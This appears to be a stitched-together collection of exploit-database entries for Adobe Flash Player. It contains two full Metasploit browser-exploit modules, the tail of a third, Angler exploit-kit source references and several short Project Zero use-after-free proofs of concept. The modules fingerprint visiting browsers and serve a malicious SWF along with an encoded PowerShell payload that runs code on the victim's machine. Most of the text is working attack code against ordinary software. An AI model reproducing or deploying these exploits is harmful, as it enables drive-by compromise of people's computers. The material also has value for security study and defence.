send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0313', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ByteArray Use After Free',
'Description' => %q{
This module exploits an use after free on Adobe Flash Player. The vulnerability,
discovered by Hacking Team and made public on its July 2015 data leak, was
described as an Use After Free while handling ByteArray objects. This module has
been tested successfully on:
Windows XP, Chrome 43 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Someone from HackingTeam
'juan vazquez' # msf module
],
'References' =>
[
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],
['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81 ||
os =~ OperatingSystems::Match::WINDOWS_VISTA ||
os =~ OperatingSystems::Match::WINDOWS_XP
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::CHROME
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
# Note: Chrome might be vague about the version.
# Instead of 18.0.0.203, it just says 18.0
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 06 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'hacking_team', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',
'Description' => %q{
This module exploits an use after free vulnerability in Adobe Flash Player. The
vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying
to uncompress() a malformed byte stream. This module has been tested successfully
on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and
16.0.0.235.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery and exploit in the wild
'hdarwin', # Public exploit by @hdarwin89
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-0311'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],
['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],
['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.287' },
:arch => ARCH_X86
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 28 2014',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
Source: https://github.com/SecurityObscurity/cve-2015-0313
PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36491.zip
Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit
Reference:
http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/
http://malware.dontneedcoffee.com/2015/02/cve-2015-0313-flash-up-to-1600296-and.html
https://helpx.adobe.com/security/products/flash-player/apsa15-02.html
Source: https://code.google.com/p/google-security-research/issues/detail?id=592
There is a use-after-free in MovieClip.startDrag. If a parameter an object with valueOf defined, this method can free the MovieClip, which is then used.
A minimal POC follows:
this.createEmptyMovieClip("mc", 1);
mc.startDrag( true, {valueOf : func}, 1, 2, 3, 4);
function func(){
mc.removeMovieClip();
// Fix heap here
return 1;
}
A sample fla and swf are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39041.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=570
There is a use-after-free issue in MovieClip.localToGlobal. If the Number constructor is overwritten with a new constructor and MovieClip.localToGlobal is called with an integer parameter, the new constructor will get called. If this constructor frees the MovieClip, a use-after-free occurs. A minimal PoC is as follows:
var a = func;
_global.Number = a;
this.createEmptyMovieClip("mc", 1);
mc.localToGlobal( 7 );
function func(){
mc.removeMovieClip();
// fix heap here
this.x = 2;
this.y = 1;
}
A sample swf and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39056.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=558
There are a number of use-after-frees in MovieClip.lineStyle. If any of the String parameters are an object with toString defined, the toString method can delete the MovieClip, which is subsequently used. A PoC is as follows:
this.createEmptyMovieClip("triangle_mc", this.getNextHighestDepth());
var o = {toString: func};
triangle_mc.lineStyle(5, 0xff00ff, 100, true, o, "round", "miter", 1);
function func(){
triangle_mc.removeMovieClip();
return "none";
}
A sample swf and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39021.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=591
There is a use-after-free in MovieClip.duplicateMovieClip. If the depth or movie name parameter provided is an object with toString or valueOf defined, this method can free the MovieClip, which is then used.
A minimal PoC follows:
this.createEmptyMovieClip("mc", 1);
mc.duplicateMovieClip( "mc",{valueOf : func});
function func(){
trace("in func");
mc.removeMovieClip();
// Fix heap here
return 5;
}
A sample swf and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39042.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=571
There is a use-after-free in MovieClip.attachMovie. If a string parameter has toString defined, a number parameter has valueOf defined or an object parameter has its constructor redefined, it can execute code and free the this object of the method, leading to a use-after-free.
A minimal PoC is as follows:
n ={valueOf : func};
function func(){
_global.mc.removeMovieClip();
// fix heap here;
}
this.createEmptyMovieClip("mc", 1);
_global.mc = mc;
mc.attachMovie("myResetButton","newResetButton", n);
A sample swf and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39055.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=593
There is a use-after-free in MovieClip.attachBitmap. If the depth parameter is an object with valueOf defined, this method can free the MovieClip, which is then used.
A minimal PoC follows:
this.createEmptyMovieClip("mc", 1);
var b = new flash.display.BitmapData(100, 100, true, 0x77777777);
mc.attachBitmap( b, {valueOf : func });
function func(){
mc.removeMovieClip();
// Fix heap here
return 5;
}
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39040.zip